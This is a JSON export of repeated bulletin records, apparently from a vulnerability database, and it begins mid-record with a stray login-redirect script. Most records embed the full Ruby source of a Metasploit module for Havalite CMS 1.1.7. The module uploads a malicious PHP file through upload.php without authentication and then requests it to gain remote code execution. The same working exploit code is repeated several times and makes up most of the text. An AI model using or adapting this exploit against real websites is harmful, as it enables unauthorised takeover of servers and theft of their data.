modified_redirect_url.concat(\"&userName=\",gCtchLogonInfo.userName);\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tdocument.location.href = modified_redirect_url;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url=' + encodedOrigUrl;\n\t\t\t\t}\n\t\t\t}\n\t\t\tcatch(e)\n\t\t\t{\n\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url='+ 
encodedOrigUrl;\n\t\t\t}\n\t\t</script> \n\n\t</body> \n</html>\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-20T14:52:32", "differentElements": ["modified", "published", "sourceData"], "edition": 92}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-20T16:28:32", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.7, "vector": "NONE", "modified": "2019-08-20T16:28:32"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1965-1", "OPENSUSE-SU-2019:1963-1", "OPENSUSE-SU-2019:1968-1", "OPENSUSE-SU-2019:1964-1", "OPENSUSE-SU-2019:1959-1", "OPENSUSE-SU-2019:1954-1", "OPENSUSE-SU-2019:1952-1", "OPENSUSE-SU-2019:1951-1"]}, {"type": "thn", "idList": ["THN:1D88818C1C20ADD5C17298B9EB532324"]}, {"type": "ubuntu", "idList": ["USN-4105-1", "USN-4107-1", "USN-4106-1", "USN-4078-2"]}, {"type": "mskb", "idList": ["KB4512482", "KB4512518", "KB4512491"]}, {"type": "aix", "idList": ["NTP_ADVISORY12.ASC"]}, {"type": "redhat", "idList": ["RHSA-2019:2519"]}, {"type": "securelist", "idList": ["SECURELIST:4CA85687D57BCAE196E136B1708E2402", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4"]}], "modified": "2019-08-20T16:28:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", 
"sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-20T16:28:32", "differentElements": ["modified", "published"], "edition": 93}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "256696488d2935c452aa3214d8109c9b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly 
prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-25T14:48:43", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2019-08-25T14:48:43"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:381046138522979793"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2005-1", "OPENSUSE-SU-2019:2007-1", "OPENSUSE-SU-2019:2008-1", "OPENSUSE-SU-2019:1999-1", "OPENSUSE-SU-2019:2000-1", "OPENSUSE-SU-2019:1997-1", "OPENSUSE-SU-2019:1989-1", "OPENSUSE-SU-2019:1990-1", "OPENSUSE-SU-2019:1994-1", "OPENSUSE-SU-2019:1988-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1896-1:572E2", "DEBIAN:DSA-4508-1:2E656", "DEBIAN:DSA-4507-1:28A22", "DEBIAN:DSA-4506-1:6D735", "DEBIAN:DLA-1894-1:39DBA", "DEBIAN:DLA-1895-1:5ADC9"]}, {"type": "mskb", "idList": ["KB4490495"]}, {"type": "threatpost", "idList": ["THREATPOST:89347D07FB03DE484AD22F0B2615197E"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154197"]}], "modified": "2019-08-25T14:48:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 
1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-25T14:48:43", "differentElements": ["modified", "published"], "edition": 94}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly 
prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-25T16:51:36", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2019-08-25T16:51:36"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:381046138522979793"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2005-1", "OPENSUSE-SU-2019:2007-1", "OPENSUSE-SU-2019:2008-1", "OPENSUSE-SU-2019:1999-1", "OPENSUSE-SU-2019:2000-1", "OPENSUSE-SU-2019:1997-1", "OPENSUSE-SU-2019:1989-1", "OPENSUSE-SU-2019:1990-1", "OPENSUSE-SU-2019:1994-1", "OPENSUSE-SU-2019:1988-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1896-1:572E2", "DEBIAN:DSA-4508-1:2E656", "DEBIAN:DSA-4507-1:28A22", "DEBIAN:DSA-4506-1:6D735", "DEBIAN:DLA-1894-1:39DBA", "DEBIAN:DLA-1895-1:5ADC9"]}, {"type": "mskb", "idList": ["KB4490495"]}, {"type": "threatpost", "idList": ["THREATPOST:89347D07FB03DE484AD22F0B2615197E"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154197"]}], "modified": "2019-08-25T16:51:36"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 
1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-25T16:51:36", "differentElements": ["sourceData"], "edition": 95}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-03T16:32:28", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2019-09-03T16:32:28"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:2631", "RHSA-2019:2630", "RHSA-2019:2628", "RHSA-2019:2621", "RHSA-2019:2609", "RHSA-2019:2607", "RHSA-2019:2606"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2059-1", "OPENSUSE-SU-2019:2058-1", "OPENSUSE-SU-2019:2057-1", "OPENSUSE-SU-2019:2052-1", "OPENSUSE-SU-2019:2051-1", "OPENSUSE-SU-2019:2050-1", "OPENSUSE-SU-2019:2056-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47348", "EDB-ID:47346", "EDB-ID:47347"]}, {"type": "ubuntu", "idList": ["USN-4119-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142840"]}, {"type": "samba", "idList": ["SAMBA:CVE-2019-10197"]}], "modified": "2019-09-03T16:32:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-03T16:32:28", "differentElements": ["sourceData"], "edition": 96}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-03T18:32:22", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 2.6, "vector": "NONE", "modified": "2019-09-03T18:32:22"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:2631", "RHSA-2019:2630", "RHSA-2019:2628", "RHSA-2019:2621", "RHSA-2019:2609", "RHSA-2019:2607", "RHSA-2019:2606"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2059-1", "OPENSUSE-SU-2019:2058-1", "OPENSUSE-SU-2019:2057-1", "OPENSUSE-SU-2019:2052-1", "OPENSUSE-SU-2019:2051-1", "OPENSUSE-SU-2019:2050-1", "OPENSUSE-SU-2019:2056-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47348", "EDB-ID:47346", "EDB-ID:47347"]}, {"type": "ubuntu", "idList": ["USN-4119-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142840"]}, {"type": "samba", "idList": ["SAMBA:CVE-2019-10197"]}], "modified": "2019-09-03T18:32:22"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-03T18:32:22", "differentElements": ["modified", "published"], "edition": 97}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "256696488d2935c452aa3214d8109c9b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly 
prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-07T00:54:42", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.4, "vector": "NONE", "modified": "2019-09-07T00:54:42"}, "dependencies": {"references": [{"type": "gentoo", "idList": ["GLSA-201909-06", "GLSA-201909-05", "GLSA-201909-04", "GLSA-201909-02", "GLSA-201909-01"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2077-1", "OPENSUSE-SU-2019:2078-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1912-1:CAAA9", "DEBIAN:DLA-1911-1:FFE7F", "DEBIAN:DSA-4517-1:44A46", "DEBIAN:DLA-1910-1:9557C"]}, {"type": "thn", "idList": ["THN:291CB82C918B55804078A040F3258456", "THN:FF07DE65AF5F03EDE8E6AF8F1D180CA1"]}, {"type": "mskb", "idList": ["KB3061064"]}, {"type": "exploitdb", "idList": ["EDB-ID:47356"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2591", "ELSA-2019-2663"]}, {"type": "cert", "idList": ["VU:672565"]}, {"type": "ubuntu", "idList": ["USN-4124-1"]}], "modified": "2019-09-07T00:54:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a 
file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": 